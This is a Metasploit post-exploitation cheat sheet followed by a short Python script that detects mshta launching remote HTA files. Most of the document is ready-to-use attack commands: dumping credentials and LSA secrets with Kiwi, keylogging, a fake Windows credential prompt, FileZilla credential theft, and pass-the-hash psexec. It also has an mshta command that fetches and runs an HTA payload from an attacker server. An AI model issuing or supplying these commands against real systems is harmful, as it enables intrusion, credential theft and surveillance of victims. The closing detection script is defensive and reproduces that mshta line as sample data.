Metasploit Usage

Enable RDP

```
use windows/manage/enable_rdp
set SESSION 1
run
```

Enable WinRM

```
sessions -i 1
powershell_execute Enable-PSRemoting -Force
```

Migrate process

PID:

```
sessions -i 1
ps
migrate $PID
```

Program name:

```
sessions -i 1
migrate -N lsass.exe
```

Kiwi Extension

```
sessions -i 1
load kiwi
creds_all
lsa_dump_sam
lsa_dump_secrets
```

Keylogger

```
sessions -i 1
keyscan_start
keyscan_dump
```

```
sessions -i 1
load extapi
help
```

Phishing Module

```
use post/windows/gather/phish_windows_credentials
set SESSION 1
set PROCESS notepad.exe
run
```

Screenshots && Screenshare

```
sessions -i 1
screenshot
```

```
sessions -i 1
load espia
screengrab
```

```
sessions -i 1
screenshare
```

Filezilla Credentials Stealing

```
use post/multi/gather/filezilla_client_cred
set SESSION 1
run
```

Applications Enumeration

```
use post/windows/gather/enum_applications
set SESSION 1
run
```

Psexec

```
use exploit/windows/smb/psexec
set RHOSTS 10.10.10.10
set SMBUSER administrator
set SMBPASS 00000000000000000000000000000000:NTLM_HASH
run
```

From a reverse-shell to a meterpreter session

Start HTA Server

```
use exploit/windows/misc/hta_server
run
```

Execute malicious HTA

```
mshta.exe http://10.10.10.10/random_file_generated.hta
```

References

AttackDefense
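On the defensive side, the HTA step above leaves a recognisable process-creation record: `mshta.exe` started with a remote URL as its argument. The following is an added example, not part of the original page, that scans Sysmon-style process-creation records for that pattern; the field names (`host`, `parent`, `cmdline`), the function names and the sample events are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed process-creation records (Sysmon Event ID 1 style); not real logs.
SAMPLE_EVENTS = [
    {"host": "WS01", "parent": "cmd.exe",
     "cmdline": "mshta.exe http://10.10.10.10/random_file_generated.hta"},
    {"host": "WS02", "parent": "explorer.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\help.hta"'},
    {"host": "WS03", "parent": "powershell.exe",
     "cmdline": r"C:\Windows\SysWOW64\MSHTA.EXE HTTPS://files.example.test/a.hta"},
    {"host": "WS04", "parent": "explorer.exe", "cmdline": "notepad.exe notes.txt"},
]

REMOTE_SCHEMES = {"http", "https", "ftp"}


def tokens(cmdline):
    """Split a Windows command line, keeping quoted arguments together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def is_mshta(image):
    """True when the image name is mshta, whatever its path, case or extension."""
    name = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name in ("mshta", "mshta.exe")


def remote_hta_launches(events):
    """Return one hit per event where mshta is given a remote URL to load."""
    hits = []
    for ev in events:
        toks = tokens(ev["cmdline"])
        if not toks or not is_mshta(toks[0]):
            continue
        for arg in toks[1:]:
            url = urlparse(arg)
            # A drive letter such as "C:" parses as scheme "c", so local files
            # are excluded by the scheme allow-list and the netloc check.
            if url.scheme in REMOTE_SCHEMES and url.netloc:
                hits.append({"host": ev["host"], "parent": ev["parent"],
                             "url": arg, "server": url.hostname})
                break
    return hits


if __name__ == "__main__":
    for hit in remote_hta_launches(SAMPLE_EVENTS):
        print(hit)
```

The locally installed `.hta` on WS02 is not flagged, so the rule stays quiet for legitimate help applications while still catching the URL form regardless of path or letter case.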